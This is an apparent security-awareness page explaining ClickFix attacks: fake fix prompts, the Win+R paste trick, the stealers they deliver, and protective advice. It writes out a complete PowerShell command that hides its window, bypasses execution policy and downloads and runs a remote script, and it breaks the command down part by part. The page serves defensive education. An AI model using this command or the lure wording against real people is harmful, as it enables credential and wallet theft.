How ClickFix Works
ClickFix is a social engineering attack that tricks you into running malicious code on your own computer. Here's exactly how it works, step by step.
You Visit a Compromised Website
You might click a link in an email, a search result, or even visit a legitimate website that's been hacked. The page looks normal at first, but then something appears to go wrong.
Common Scenarios:
- Fake CAPTCHA: "Verify you are human" (often mimics Cloudflare)
- Browser Update: "Chrome is missing a critical security update"
- Google Meet/Zoom: "Microphone format not supported - fix to join"
- FileFix: "Display Error - paste path into File Explorer to fix"
- ConsentFix: "Verify identity to access document" (OAuth abuse)
The Website Presents You Fake "Fix" Instructions
A prompt appears with very specific instructions. It usually says something like:
1. Press the Windows key and R key at the same time
2. Press Ctrl + V to paste
3. Press Enter
Why this is dangerous:
The Win + R combination opens the Windows "Run" dialog, which is a powerful system tool. It can run any program or command on your computer. When you press Ctrl + V, you're pasting a command that the malicious website secretly copied to your clipboard.
You Inadvertantly Execute a Malicious Command
When you paste and press Enter, you're running a command that looks something like this:
1
powershell -windowstyle hidden -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('https://clickfix.fyi/static/example.ps1')"
What each part does:
powershell- Launches PowerShell, a powerful command-line tool built into Windows
-windowstyle hidden- Hides the window so you don't see what's happening
-ExecutionPolicy Bypass- Disables Windows security features that would normally block suspicious scripts
IEX- Short for "Invoke-Expression" - runs whatever code comes next
New-Object Net.WebClient- Creates a tool to download files from the internet
DownloadString('hxxps://...')- Downloads a malicious script from the attacker's server and runs it immediately
The Malware Runs on Your Computer
The downloaded script typically does one or more of the following:
- Steals your passwords - Searches your browser's saved passwords and sends them to the attacker
- Steals your cookies - Takes your login sessions so the attacker can access your accounts
- Searches for cryptocurrency wallets - Looks for Bitcoin, Ethereum, and other crypto wallet files
- Takes screenshots - Captures what's on your screen
- Installs a backdoor - Gives the attacker permanent remote access to your computer
Real Malware Families Distributed via ClickFix:
- Lumma Stealer - The most common payload in 2025. Steals passwords, session cookies, and crypto wallets.
- DarkGate - A sophisticated loader used by groups like Storm-0249 to deploy ransomware.
- AsyncRAT - Open-source remote access tool modified for surveillance.
- StealC - A lightweight stealer often dropped via "FileFix" lures.
How to Protect Yourself
- Never paste commands from websites - No legitimate website will ever ask you to open the Run dialog and paste a command
- Be suspicious of "fix" instructions - Real technical problems don't get fixed by pasting mysterious commands
- Check the URL - Real Google, Microsoft, or Facebook pages won't show these prompts
- When in doubt, close the tab - If something feels off, just close the browser tab and navigate to the site directly
See it in Action
Try our safe, interactive demo to see what a ClickFix attack looks like.
View Interactive Demo